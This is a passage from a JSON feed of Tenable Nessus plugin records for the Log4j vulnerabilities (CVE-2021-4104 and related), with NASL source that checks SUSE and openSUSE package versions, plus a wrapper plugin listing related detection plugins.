openSUSE 15 Security Update : logback (openSUSE-SU-2021:4109-1)\": \"openSUSE-2021-4109.nasl\",\n \"156177 openSUSE 15 Security Update : log4j (openSUSE-SU-2021:4111-1)\": \"openSUSE-2021-4111.nasl\",\n \"156181 openSUSE 15 Security Update : log4j12 (openSUSE-SU-2021:4112-1)\": \"openSUSE-2021-4112.nasl\",\n \"156167 SUSE SLES11 Security Update : log4j (SUSE-SU-2021:14866-1)\": \"suse_SU-2021-14866-1.nasl\",\n \"156169 SUSE SLES15 Security Update : log4j (SUSE-SU-2021:4111-1)\": \"suse_SU-2021-4111-1.nasl\",\n \"156172 SUSE SLED15 / SLES15 Security Update : log4j12 (SUSE-SU-2021:4112-1)\": \"suse_SU-2021-4112-1.nasl\",\n \"156170 SUSE SLED12 / SLES12 Security Update : log4j (SUSE-SU-2021:4115-1)\": \"suse_SU-2021-4115-1.nasl\",\n \"156197 Apache Log4Shell RCE detection via callback correlation (Direct Check NetBIOS)\": \"apache_log4shell_netbios.nbin\",\n \"156206 Oracle Linux 7 : log4j (ELSA-2021-5206)\": \"oraclelinux_ELSA-2021-5206.nasl\",\n \"156218 openSUSE 15 Security Update : log4j (openSUSE-SU-2021:1601-1)\": \"openSUSE-2021-1601.nasl\",\n \"156210 FreeBSD : graylog -- remote code execution in log4j from user-controlled log input (650734b2-7665-4170-9a0a-eeced5e10a5e)\": \"freebsd_pkg_650734b2766541709a0aeeced5e10a5e.nasl\",\n \"156232 Apache Log4Shell RCE detection via callback correlation (Direct Check SMB)\": \"log4j_log4shell_smb.nbin\",\n \"156258 Apache Log4Shell RCE detection via callback correlation (Direct Check NTP)\": \"log4j_log4shell_ntp.nbin\",\n \"156257 Apache Log4Shell RCE detection via callback correlation (Direct Check DNS)\": \"apache_log4shell_dns.nbin\",\n \"156256 Apache Log4Shell RCE detection via callback correlation (Direct Check SNMP)\": \"apache_log4shell_snmp.nbin\",\n \"156279 openSUSE 15 Security Update : logback (openSUSE-SU-2021:1613-1)\": \"openSUSE-2021-1613.nasl\",\n \"156276 openSUSE 15 Security Update : log4j12 (openSUSE-SU-2021:1612-1)\": \"openSUSE-2021-1612.nasl\",\n \"156324 FreeBSD : OpenSearch -- Log4Shell (b0f49cb9-6736-11ec-9eea-589cfc007716)\": \"freebsd_pkg_b0f49cb9673611ec9eea589cfc007716.nasl\",\n \"156327 Apache Log4j 2.0 < 2.3.2 / 2.4 < 2.12.4 / 2.13 < 2.17.1 RCE\": \"apache_log4j_2_17_1.nasl\",\n \"156264 Amazon Linux AMI : log4j-cve-2021-44228-hotpatch (ALAS-2021-1554)\": \"ala_ALAS-2021-1554.nasl\",\n \"156375 Apache Log4Shell RCE detection via callback correlation (Direct Check UPnP)\": \"apache_log4shell_upnp.nbin\",\n \"156340 openSUSE 15 Security Update : kafka (openSUSE-SU-2021:1631-1)\": \"openSUSE-2021-1631.nasl\",\n \"156441 Ubiquiti UniFi Network Log4Shell Direct Check (CVE-2021-44228)\": \"ubiquiti_unifi_network_log4shell.nbin\",\n \"156455 Apache Log4Shell RCE detection via callback correlation (Direct Check PPTP)\": \"log4j_log4shell_pptp.nbin\",\n \"156471 Apache Solr Log4Shell Direct Check (CVE-2021-44228)\": \"apache_solr_log4shell.nbin\",\n \"156473 Apache OFBiz Log4Shell Direct Check (CVE-2021-44228)\": \"apache_ofbiz_log4shell.nbin\",\n \"156560 VMware Horizon Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-0028)\": \"vmware_horizon_log4shell.nbin\",\n \"156558 Apache JSPWiki Log4Shell Direct Check (CVE-2021-44228)\": \"apache_jspwiki_log4shell.nbin\",\n \"156559 Apache Log4Shell RCE detection via callback correlation (Direct Check RPCBIND)\": \"log4j_log4shell_rpcbind.nbin\",\n \"156669 Apache Log4Shell RCE detection via callback correlation (Direct Check MSRPC)\": \"apache_log4shell_msrpc.nbin\",\n \"156712 Ubuntu 18.04 LTS / 20.04 LTS / 21.04 / 21.10 : Apache Log4j 1.2 vulnerability (USN-5223-1)\": \"ubuntu_USN-5223-1.nasl\",\n \"156753 Apache Druid Log4Shell Direct Check (CVE-2021-44228)\": \"apache_druid_log4shell.nbin\",\n \"156893 Oracle Primavera Gateway (Jan 2022 CPU)\": \"oracle_primavera_gateway_cpu_jan_2022.nasl\",\n \"156891 Oracle Primavera P6 Enterprise Project Portfolio Management (Jan 2022 CPU)\": \"oracle_primavera_p6_eppm_cpu_jan_2022.nasl\",\n \"156871 Amazon Linux AMI : log4j (ALAS-2022-1562)\": \"ala_ALAS-2022-1562.nasl\",\n \"156932 VMware vRealize Operations Manager Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-0028)\": \"vmware_vrealize_operations_manager_log4shell.nbin\",\n \"156941 MobileIron Core Log4Shell Direct Check (CVE-2021-44228)\": \"mobileiron_log4shell.nbin\",\n \"157137 Oracle Linux 6 : log4j (ELSA-2022-9056)\": \"oraclelinux_ELSA-2022-9056.nasl\",\n \"157159 Oracle Linux 8 : parfait:0.5 (ELSA-2022-0290)\": \"oraclelinux_ELSA-2022-0290.nasl\"\n};\n\nvar bullet_point_names_list = '';\nforeach name (keys(script_names_filenames)) {\n bullet_point_names_list += ' - ' + name + '\\n';\n}\n\nif (description)\n{\n script_id(156061);\n script_version(\"1.34\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/02/02\");\n\n script_name(english:\"Log4Shell Ecosystem Wrapper\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin serves as a launcher plugin for plugins in the Apache Log4j vulnerable ecosystem.\");\n script_set_attribute(attribute:\"description\", value:\n\"This plugin was used in the scan template 'Log4Shell Vulnerability Ecosystem' (prior to 2/2/2022) as a way to include other plugins related\nto the Log4j vulnerabilities CVE-2021-44228, CVE-2021-44832, CVE-2021-45046, and CVE-2021-4104, including those based \non patches from other vendors.\" + '\\n' + bullet_point_names_list + '\\n');\n script_set_attribute(attribute:\"solution\", value:\n\"N/A\");\n script_set_attribute(attribute:\"risk_factor\", value:\"None\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n foreach dep (script_names_filenames) {\n script_dependencies(dep);\n }\n\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-04-11T03:46:54", "description": "The remote SUSE Linux SLED12 / SLES12 host has packages installed that are affected by a vulnerability as referenced in the SUSE-SU-2021:4115-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-12-18T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : log4j (SUSE-SU-2021:4115-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228"], "modified": "2022-01-20T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:log4j", "p-cpe:/a:novell:suse_linux:log4j-manual", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2021-4115-1.NASL", "href": "https://www.tenable.com/plugins/nessus/156170", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2021:4115-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156170);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/20\");\n\n script_cve_id(\"CVE-2021-4104\");\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2021:4115-1\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : log4j (SUSE-SU-2021:4115-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLED12 / SLES12 host has packages installed that are affected by a vulnerability as referenced in\nthe SUSE-SU-2021:4115-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write\n access to the Log4j configuration. The attacker can provide TopicBindingName and\n TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result\n in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2\n when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of\n life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the\n previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1193662\");\n # https://lists.suse.com/pipermail/sle-security-updates/2021-December/009918.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ed6408a4\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-4104\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected log4j and / or log4j-manual packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-4104\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:log4j-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nvar os_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLED12 / SLES12', 'SUSE ' + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE ' + os_ver, cpu);\n\nvar sp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(5)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP5\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2|3|4|5)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3/4/5\", os_ver + \" SP\" + sp);\n\nvar pkgs = [\n {'reference':'log4j-1.2.15-126.6.1', 'sp':'3', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLES_SAP-release-12.3'},\n {'reference':'log4j-1.2.15-126.6.1', 'sp':'4', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLES_SAP-release-12.4'},\n {'reference':'log4j-1.2.15-126.6.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'SLES_SAP-release-12.5'},\n {'reference':'log4j-1.2.15-126.6.1', 'sp':'5', 'release':'SLED12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-sdk-release-12.5'},\n {'reference':'log4j-1.2.15-126.6.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-sdk-release-12.5'},\n {'reference':'log4j-manual-1.2.15-126.6.1', 'sp':'5', 'release':'SLED12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-sdk-release-12.5'},\n {'reference':'log4j-manual-1.2.15-126.6.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-sdk-release-12.5'},\n {'reference':'log4j-1.2.15-126.6.1', 'sp':'2', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-12.2'},\n {'reference':'log4j-1.2.15-126.6.1', 'sp':'3', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-12.3'},\n {'reference':'log4j-1.2.15-126.6.1', 'sp':'3', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-12.3'},\n {'reference':'log4j-1.2.15-126.6.1', 'sp':'4', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-12.4'},\n {'reference':'log4j-1.2.15-126.6.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sles-release-12.5'}\n];\n\nvar ltss_caveat_required = FALSE;\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var exists_check = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (exists_check) {\n if (!rpm_exists(release:release, rpm:exists_check)) continue;\n if ('ltss' >< tolower(exists_check)) ltss_caveat_required = TRUE;\n }\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n var ltss_plugin_caveat = NULL;\n if(ltss_caveat_required) ltss_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check contains fixes that apply to\\n' +\n 'packages only available in SUSE Enterprise Linux Server LTSS\\n' +\n 'repositories. Access to these package security updates require\\n' +\n 'a paid SUSE LTSS subscription.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + ltss_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'log4j / log4j-manual');\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-04-11T03:45:20", "description": "The remote SUSE Linux SLED15 / SLES15 host has packages installed that are affected by a vulnerability as referenced in the SUSE-SU-2021:4112-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-12-18T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : log4j12 (SUSE-SU-2021:4112-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228"], "modified": "2022-01-20T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:log4j12", "p-cpe:/a:novell:suse_linux:log4j12-javadoc", "p-cpe:/a:novell:suse_linux:log4j12-manual", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2021-4112-1.NASL", "href": "https://www.tenable.com/plugins/nessus/156172", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2021:4112-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156172);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/20\");\n\n script_cve_id(\"CVE-2021-4104\");\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2021:4112-1\");\n script_xref(name:\"IAVA\", value:\"2021-A-0573\");\n script_xref(name:\"IAVA\", value:\"0001-A-0650\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : log4j12 (SUSE-SU-2021:4112-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLED15 / SLES15 host has packages installed that are affected by a vulnerability as referenced in\nthe SUSE-SU-2021:4112-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write\n access to the Log4j configuration. The attacker can provide TopicBindingName and\n TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result\n in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2\n when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of\n life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the\n previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1193662\");\n # https://lists.suse.com/pipermail/sle-security-updates/2021-December/009916.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?51d6c27a\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2021-4104\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected log4j12, log4j12-javadoc and / or log4j12-manual packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-4104\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/12/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/12/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:log4j12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:log4j12-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:log4j12-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nvar os_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLED15 / SLES15', 'SUSE ' + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE ' + os_ver, cpu);\n\nvar sp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP2/3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(2|3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP2/3\", os_ver + \" SP\" + sp);\n\nvar pkgs = [\n {'reference':'log4j12-1.2.17-4.3.1', 'sp':'2', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-basesystem-release-15.2'},\n {'reference':'log4j12-1.2.17-4.3.1', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-basesystem-release-15.2'},\n {'reference':'log4j12-1.2.17-4.3.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-basesystem-release-15.3'},\n {'reference':'log4j12-1.2.17-4.3.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-basesystem-release-15.3'},\n {'reference':'log4j12-javadoc-1.2.17-4.3.1', 'sp':'2', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.2'},\n {'reference':'log4j12-javadoc-1.2.17-4.3.1', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.2'},\n {'reference':'log4j12-manual-1.2.17-4.3.1', 'sp':'2', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.2'},\n {'reference':'log4j12-manual-1.2.17-4.3.1', 'sp':'2', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.2'},\n {'reference':'log4j12-javadoc-1.2.17-4.3.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.3'},\n {'reference':'log4j12-javadoc-1.2.17-4.3.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.3'},\n {'reference':'log4j12-manual-1.2.17-4.3.1', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.3'},\n {'reference':'log4j12-manual-1.2.17-4.3.1', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'sle-module-development-tools-release-15.3'}\n];\n\nvar ltss_caveat_required = FALSE;\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var exists_check = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && release) {\n if (exists_check) {\n if (!rpm_exists(release:release, rpm:exists_check)) continue;\n if ('ltss' >< tolower(exists_check)) ltss_caveat_required = TRUE;\n }\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'log4j12 / log4j12-javadoc / log4j12-manual');\n}\n", "cvss": {"score": 6, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-04-11T03:46:21", "description": "The remote SUSE Linux SUSE15 host has packages installed that are affected by a vulnerability as referenced in the openSUSE-SU-2021:4112-1 advisory.\n\n - JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228. Note this issue only affects Log4j 1.2 when specifically configured to use JMSAppender, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. (CVE-2021-4104)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-12-18T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : log4j12 (openSUSE-SU-2021:4112-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228"], "modified": "2022-01-20T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:log4j12", "p-cpe:/a:novell:opensuse:log4j12-javadoc", "p-cpe:/a:novell:opensuse:log4j12-manual", "cpe:/o:novell:opensuse:15.3"], "id": "OPENSUSE-2021-4112.NASL", "href": "https://www.tenable.com/plugins/nessus/156181", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2021:4112-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156181);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", 